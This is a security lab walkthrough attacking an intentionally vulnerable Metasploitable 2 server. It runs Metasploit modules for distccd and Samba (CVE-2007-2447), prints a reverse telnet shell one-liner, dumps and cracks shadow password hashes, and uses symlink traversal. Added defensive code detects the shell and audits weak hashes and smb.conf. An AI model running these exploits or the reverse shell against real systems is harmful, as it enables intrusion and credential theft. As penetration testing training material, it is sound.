
Vulnerabilities of the Metasploitable V2 Linux server (distccd, samba)

(5) Exploiting a bug (vulnerability with a backdoor present)

 

Lab systems

- KaliLinux (EX: attacker system)

- Metasploitable V2 Linux (EX: victim system)

 

Attack overview

 

Security weakness to execute arbitrary commands on any system running distccd.

distccd - distributed compilation program

 

Exploitation procedure (distccd backdoor vulnerability)

(KaliLinux)

Check for the distccd daemon

# nmap -p 3632 192.168.10.134

Starting Nmap 7.01 ( https://nmap.org ) at 2016-04-01 19:20 KST

Nmap scan report for 192.168.10.134

Host is up (0.00030s latency).

PORT     STATE SERVICE
3632/tcp open  distccd

MAC Address: 00:0C:29:FA:DD:2A (VMware)

 

Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds

 

 

# msfconsole -q

msf > search distcc

 

Matching Modules

================

 

Name                           Disclosure Date  Rank       Description
----                           ---------------  ----       -----------
exploit/unix/misc/distcc_exec  2002-02-01       excellent  DistCC Daemon Command Execution

 

 

msf > use exploit/unix/misc/distcc_exec

msf exploit(distcc_exec) > show options

 

Module options (exploit/unix/misc/distcc_exec):

 

Name   Current Setting  Required  Description
----   ---------------  --------  -----------
RHOST                   yes       The target address
RPORT  3632             yes       The target port

 

 

Exploit target:

 

Id  Name
--  ----
0   Automatic Target

 

msf exploit(distcc_exec) > set RHOST 192.168.10.134

RHOST => 192.168.10.134

msf exploit(distcc_exec) > run

 

[*] Started reverse TCP double handler on 192.168.10.50:4444

[*] Accepted the first client connection...

[*] Accepted the second client connection...

[*] Command: echo pX7hrrhiIh6Lt5w2;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets...

[*] Reading from socket B

[*] B: "pX7hrrhiIh6Lt5w2\r\n"

[*] Matching...

[*] A is input...

[*] Command shell session 1 opened (192.168.10.50:4444 -> 192.168.10.134:60579) at 2016-04-01 19:24:46 +0900

 

id

uid=1(daemon) gid=1(daemon) groups=1(daemon)

pwd

/tmp

hostname

metasploitable

ifconfig eth0

..... (omitted) .....

 

(6) Exploiting a bug (samba vulnerability present)

 

Lab systems

- KaliLinux (EX: attacker system)

- Metasploitable V2 Linux (EX: victim system)

 

Attack overview

 

Exploit: CVE-2007-2447

 

The MS-RPC functionality in smbd in Samba 3.0.0 through 3.0.25rc3 allows remote attackers to execute arbitrary commands via shell metacharacters involving the (1) SamrChangePassword function, when the "username map script" smb.conf option is enabled, and allows remote authenticated users to execute commands via shell metacharacters involving other MS-RPC functions in the (2) remote printer and (3) file share management.

 

The root cause is passing unfiltered user input provided via MS-RPC calls to /bin/sh when invoking external scripts defined in smb.conf.

 

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2447

http://www.samba.org/samba/security/CVE-2007-2447.html

 

 

Exploitation procedure (samba vulnerability)

(KaliLinux)

Check the samba service

# nmap -sV 192.168.10.134

53/tcp  open  domain       ISC BIND 9.4.2
80/tcp  open  http         Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open  rpcbind      2 (RPC #100000)
139/tcp open  netbios-ssn  Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn  Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open  exec         netkit-rsh rexecd
513/tcp open  login?

 

 

# msfconsole -q

msf > search samba

msf > use exploit/multi/samba/usermap_script

msf exploit(usermap_script) > set rhost 192.168.10.134

msf exploit(usermap_script) > show payloads

msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse

msf exploit(usermap_script) > set lhost 192.168.10.50

msf exploit(usermap_script) > run

 

(Metasploitable V2 Linux)

Analysis on the Metasploitable V2 Linux server

$ id

uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)

 

$ sudo su -

[sudo] password for msfadmin: (msfadmin)

 

Check the metasploit session

# alias grep='grep --color'

# netstat -anp | head -2 ; netstat -anp | grep :4444

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 192.168.10.134:58284    192.168.10.50:4444      ESTABLISHED 5721/telnet
tcp        0      0 192.168.10.134:58283    192.168.10.50:4444      ESTABLISHED 5718/telnet

 

Check the reverse telnet

# ps -ef | grep 5721 | grep -v grep

UID        PID  PPID  C STIME TTY          TIME CMD
root      5721     1  0 07:05 ?        00:00:00 telnet 192.168.10.50 4444

 

# ps -ef | grep 5718 | grep -v grep

UID        PID  PPID  C STIME TTY          TIME CMD
root      5718     1  0 07:05 ?        00:00:00 telnet 192.168.10.50 4444

 

Check the /bin/sh session attached to the Metasploit server

# ps -ef | grep 4444 | grep -v grep

UID        PID  PPID  C STIME TTY          TIME CMD
root      5718     1  0 07:05 ?        00:00:00 telnet 192.168.10.50 4444
root      5719     1  0 07:05 ?        00:00:00 sh -c (sleep 4063|telnet 192.168.10.50 4444|while : ; do sh && break; done 2>&1|telnet 192.168.10.50 4444 >/dev/null 2>&1 &)
root      5721     1  0 07:05 ?        00:00:00 telnet 192.168.10.50 4444

 

The payload used, "cmd/unix/reverse", is described as "Unix Command Shell, Double Reverse TCP (telnet)".

Judging from the above, it works by establishing two telnet sessions.
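The three root processes above are the victim-side fingerprint of that payload: two telnet clients to the same attacker port plus an sh -c wrapper that pipes a shell between them, all re-parented to PID 1. The detection logic below is an added example, not part of the original post; it runs over a constructed ps -ef sample modeled on that output and flags the pattern.

```python
import re
from collections import defaultdict

# Constructed `ps -ef` sample mirroring the victim-side output above (plus init and one
# interactive telnet to a real telnet port, so the filter has something to ignore).
PS_SAMPLE = """\
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 07:00 ?        00:00:01 /sbin/init
root      5718     1  0 07:05 ?        00:00:00 telnet 192.168.10.50 4444
root      5719     1  0 07:05 ?        00:00:00 sh -c (sleep 4063|telnet 192.168.10.50 4444|while : ; do sh && break; done 2>&1|telnet 192.168.10.50 4444 >/dev/null 2>&1 &)
root      5721     1  0 07:05 ?        00:00:00 telnet 192.168.10.50 4444
msfadmin  6001  5990  0 07:10 pts/0    00:00:00 telnet 192.168.10.1 23
"""

TELNET_CLIENT = re.compile(r"^telnet\s+(\S+)\s+(\d+)$")
# `sh -c` wrapper with a shell sitting in a pipeline between telnet clients
SHELL_WRAPPER = re.compile(r"\bsh -c .*telnet .*\|.*\bsh\b")

def parse_ps(text):
    """Split `ps -ef` rows into dicts; CMD is kept whole since it contains spaces."""
    rows = []
    for line in text.splitlines()[1:]:
        parts = line.split(None, 7)
        if len(parts) == 8:
            uid, pid, ppid, _c, _stime, _tty, _time, cmd = parts
            rows.append({"uid": uid, "pid": int(pid), "ppid": int(ppid), "cmd": cmd})
    return rows

def find_double_reverse_telnet(text):
    """Flag the cmd/unix/reverse footprint: paired telnet clients and their sh -c wrapper."""
    findings, endpoints = [], defaultdict(list)
    for r in parse_ps(text):
        m = TELNET_CLIENT.match(r["cmd"])
        # outbound telnet client on a non-telnet port, re-parented to init (PPID 1)
        if m and r["ppid"] == 1 and m.group(2) != "23":
            endpoints[(m.group(1), m.group(2))].append(r["pid"])
        if SHELL_WRAPPER.search(r["cmd"]):
            findings.append(f"pid {r['pid']} ({r['uid']}): shell wrapper piping sh between telnet clients")
    for (host, port), pids in endpoints.items():
        if len(pids) >= 2:
            findings.append(f"pids {pids}: {len(pids)} telnet clients to {host}:{port} (double reverse shell)")
    return findings
```

On a live host the same check is fed with the real output of `ps -ef`; the netstat pairing above (two ESTABLISHED connections to one foreign port) is the network-side view of the same two PIDs.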

 

(KaliLinux)

Once the analysis is complete, terminate the msfconsole session

..... (omitted) .....

^C

Abort session 1? [y/N] y

 

[*] 192.168.10.134 - Command shell session 1 closed. Reason: User exit

msf exploit(usermap_script) > exit

 

Hash dump of the /etc/shadow file

# msfconsole -q

msf > use exploit/multi/samba/usermap_script

msf exploit(usermap_script) > set RHOST 192.168.10.134

RHOST => 192.168.10.134

msf exploit(usermap_script) > exploit

 

[*] Started reverse TCP double handler on 192.168.10.50:4444

[*] Accepted the first client connection...

[*] Accepted the second client connection...

[*] Command: echo OcPfxno0Q9dF46uW;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets...

[*] Reading from socket B

[*] B: "OcPfxno0Q9dF46uW\r\n"

[*] Matching...

[*] A is input...

[*] Command shell session 1 opened (192.168.10.50:4444 -> 192.168.10.134:55317) at 2016-04-05 14:15:13 +0900

 

^Z        Drop out into the wait (background) state.

Background session 1? [y/N] y

msf exploit(usermap_script) > sessions -l

 

Active sessions

===============

 

Id  Type        Information  Connection
--  ----        -----------  ----------
1   shell unix               192.168.10.50:4444 -> 192.168.10.134:55317 (192.168.10.134)

 

msf exploit(usermap_script) > use post/linux/gather/hashdump

msf post(hashdump) > show options

 

Module options (post/linux/gather/hashdump):

 

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SESSION                   yes       The session to run this module on.

 

msf post(hashdump) > set SESSION 1

SESSION => 1

msf post(hashdump) > exploit

 

[+] root:$1$CmDHSTw9$Ei9EjfjLrTkGgX7atpnlW0:0:0:root:/root:/bin/bash

[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh

[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false

[+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash

[+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash

[+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash

[+] user1:$1$N6t1HJDU$fN1iwuakspABsXj..4lmf/:1003:1003::/home/user1:/bin/bash

[+] Unshadowed Password File: /root/.msf5/loot/20160405141842_default_192.168.10.134_linux.hashes_958442.txt

[*] Post module execution completed

msf post(hashdump) > exit

[*] You have active sessions open, to exit anyway type "exit -y"

msf post(hashdump) > exit -y

 

# john /root/.msf5/loot/20160405141842_default_192.168.10.134_linux.hashes_958442.txt

Warning: detected hash type "md5crypt", but the string is also recognized as "aix-smd5"

Use the "--format=aix-smd5" option to force loading these as that type instead

Using default input encoding: UTF-8

Loaded 8 password hashes with 8 different salts (md5crypt, crypt(3) $1$ [MD5 128/128 XOP 4x2])

Remaining 7 password hashes with 7 different salts

Press 'q' or Ctrl-C to abort, almost any other key for status

postgres (postgres)

user (user)

msfadmin (msfadmin)

user1 (user1)

service (service)

123456789 (klog)

batman (sys)

7g 0:00:00:00 DONE 2/3 (2016-04-05 14:22) 21.87g/s 18800p/s 18884c/s 18884C/s asdfgh..fishing

Use the "--show" option to display all of the cracked passwords reliably

Session completed

 

# john --show /root/.msf5/loot/20160405141842_default_192.168.10.134_linux.hashes_958442.txt

root:soldesk1.:0:0:root:/root:/bin/bash

sys:batman:3:3:sys:/dev:/bin/sh

klog:123456789:103:104::/home/klog:/bin/false

msfadmin:msfadmin:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash

postgres:postgres:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash

user:user:1001:1001:just a user,111,,:/home/user:/bin/bash

service:service:1002:1002:,,,:/home/service:/bin/bash

user1:user1:1003:1003::/home/user1:/bin/bash

 

8 password hashes cracked, 0 left
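john recovers every password because the accounts use trivially guessable ones; the commonest pattern here, username as password, can be audited directly. The following is an added example, not part of the original post: it implements the $1$ md5crypt scheme these hashes use (MD5 with a fixed 1000 rounds, a cheap work factor that lets john test thousands of candidates per second) and verifies three entries copied from the loot above against their own usernames.

```python
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def _to64(v, n):
    """crypt(3)'s own base-64: n characters, low 6 bits first."""
    return "".join(ITOA64[(v >> (6 * i)) & 0x3F] for i in range(n))

def md5crypt(password: bytes, salt: bytes) -> str:
    """The $1$ scheme: MD5 with a fixed 1000 rounds and an up-to-8-character salt."""
    salt = salt[:8]
    ctx = hashlib.md5(password + b"$1$" + salt)
    alt = hashlib.md5(password + salt + password).digest()
    for n in range(len(password), 0, -16):      # alt digest, repeated to password length
        ctx.update(alt[:min(16, n)])
    i = len(password)
    while i:                                    # one byte per bit of the length
        ctx.update(b"\0" if i & 1 else password[:1])
        i >>= 1
    final = ctx.digest()
    for r in range(1000):                       # the only work factor, and it cannot be raised
        c = hashlib.md5(password if r & 1 else final)
        if r % 3:
            c.update(salt)
        if r % 7:
            c.update(password)
        c.update(final if r & 1 else password)
        final = c.digest()
    order = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    out = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in order)
    return "$1$" + salt.decode() + "$" + out + _to64(final[11], 2)

# Three entries copied from the unshadowed loot file above; klog's password is not its username.
SAMPLE = [
    "msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash",
    "user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash",
    "klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false",
]

def username_as_password(entries):
    """Return accounts whose $1$ hash verifies against their own username."""
    weak = []
    for entry in entries:
        user, h = entry.split(":")[:2]
        if h.startswith("$1$") and md5crypt(user.encode(), h.split("$")[2].encode()) == h:
            weak.append(user)
    return weak
```

Accounts still stored as $1$ should be migrated to a modern scheme (sha512crypt or yescrypt on current Linux) by forcing a password change; md5crypt has no tunable cost, so the only remedy is a different algorithm.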

 

# cd /root/.msf5/loot

# ls -l

합계 12
-rw-r--r-- 1 root root 1361  4월  5 14:18 20160405141841_default_192.168.10.134_linux.shadow_027812.txt
-rw-r--r-- 1 root root  649  4월  5 14:18 20160405141842_default_192.168.10.134_linux.hashes_958442.txt
-rw-r--r-- 1 root root 1749  4월  5 14:18 20160405141842_default_192.168.10.134_linux.passwd_741349.txt

 

Check the contents of the following files.

# cat 20160405141842_default_192.168.10.134_linux.passwd_741349.txt

# cat 20160405141841_default_192.168.10.134_linux.shadow_027812.txt

# cat 20160405141842_default_192.168.10.134_linux.hashes_958442.txt

 

The unshadowed file

 

Let us also look at how another vulnerability of the Samba server is exploited.

 

Samba, when configured with a writeable file share and "wide links" enabled (default is on), can also be used as a backdoor of sorts to access files that were not meant to be shared. The example below uses a Metasploit module to provide access to the root filesystem using an anonymous connection and a writeable share.

 

(KaliLinux)

# smbclient -L //192.168.10.134

 

# msfconsole -q

msf > search samba_symlink

 

Matching Modules

================

 

Name                                         Disclosure Date  Rank    Description
----                                         ---------------  ----    -----------
auxiliary/admin/smb/samba_symlink_traversal                   normal  Samba Symlink Directory Traversal

 

msf > use auxiliary/admin/smb/samba_symlink_traversal

msf auxiliary(samba_symlink_traversal) > show options

 

Module options (auxiliary/admin/smb/samba_symlink_traversal):

 

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
RHOST                       yes       The target address
RPORT      445              yes       The SMB service port
SMBSHARE                    yes       The name of a writeable share on the server
SMBTARGET  rootfs           yes       The name of the directory that should point to the root filesystem

 

msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.10.134

RHOST => 192.168.10.134

msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp

SMBSHARE => tmp

msf auxiliary(samba_symlink_traversal) > exploit

[*] 192.168.10.134:445 - Connecting to the server...

[*] 192.168.10.134:445 - Trying to mount writeable share 'tmp'...

[*] 192.168.10.134:445 - Trying to link 'rootfs' to the root filesystem...

[*] 192.168.10.134:445 - Now access the following share to browse the root filesystem:

[*] 192.168.10.134:445 - \\192.168.10.134\tmp\rootfs\

 

[*] Auxiliary module execution completed

msf auxiliary(samba_symlink_traversal) > exit

 

# smbclient //192.168.10.134/tmp

WARNING: The "syslog" option is deprecated

Enter root's password:

Anonymous login successful

Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian]

 

smb: \> cd rootfs

smb: \rootfs\> cd etc

smb: \rootfs\etc\> more passwd

getting file \rootfs\etc\passwd of size 1710 as /tmp/smbmore.BlS2T6 (1669.8 KiloBytes/sec) (average 1669.9 KiloBytes/sec)

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/bin/sh

bin:x:2:2:bin:/bin:/bin/sh

sys:x:3:3:sys:/dev:/bin/sh

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/bin/sh

man:x:6:12:man:/var/cache/man:/bin/sh

..... (omitted) .....

 

Everything, down to the subdirectories, is shared.
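Both Samba issues in this post trace back to smb.conf: "username map script" (CVE-2007-2447) and "wide links = yes" combined with a share an anonymous client can write to (the symlink traversal just shown). The audit below is an added example, not part of the original post or of Samba; it parses a constructed smb.conf modeled on the lab host and reports each risky combination together with the setting that removes it.

```python
import configparser

# Constructed smb.conf modeled on the lab host (Samba 3.0.20 with a guest-writable [tmp]
# share); it is a sample for this example, not the page's actual configuration file.
SMB_CONF = """
[global]
   workgroup = WORKGROUP
   username map script = /etc/samba/scripts/mapusers.sh
   wide links = yes
   unix extensions = yes

[tmp]
   path = /tmp
   read only = no
   guest ok = yes
"""

def parse_smb_conf(text):
    # smb.conf is INI-like; keys are case-insensitive and may contain spaces.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    return {s.lower(): {k: v.strip() for k, v in cp.items(s)} for s in cp.sections()}

def is_yes(value):
    return value.strip().lower() in ("yes", "true", "1")

def audit_smb_conf(text):
    cfg = parse_smb_conf(text)
    g = cfg.get("global", {})
    findings = []
    # CVE-2007-2447: smbd hands the unfiltered client username to /bin/sh via this script
    # (Samba 3.0.0 to 3.0.25rc3). Unset it, or run a fixed release.
    if g.get("username map script"):
        findings.append("[global]: 'username map script' is set (CVE-2007-2447 exposure on Samba < 3.0.25)")
    # Symlink traversal needs three things: wide links (default yes on 3.0.x), unix extensions
    # (lets an SMB client create the symlink) and a share the client can write to.
    wide = is_yes(g.get("wide links", "yes"))
    unix_ext = is_yes(g.get("unix extensions", "yes"))
    for name, s in cfg.items():
        if name == "global":
            continue
        writable = is_yes(s.get("writeable", s.get("writable", "no"))) or not is_yes(s.get("read only", "yes"))
        guest = is_yes(s.get("guest ok", "no")) or is_yes(s.get("public", "no"))
        if writable and guest:
            findings.append(f"[{name}]: writable share reachable with guest/anonymous access")
        if writable and wide and unix_ext:
            findings.append(f"[{name}]: writable share with 'wide links = yes'; set 'wide links = no' to stop symlink escape")
    return findings
```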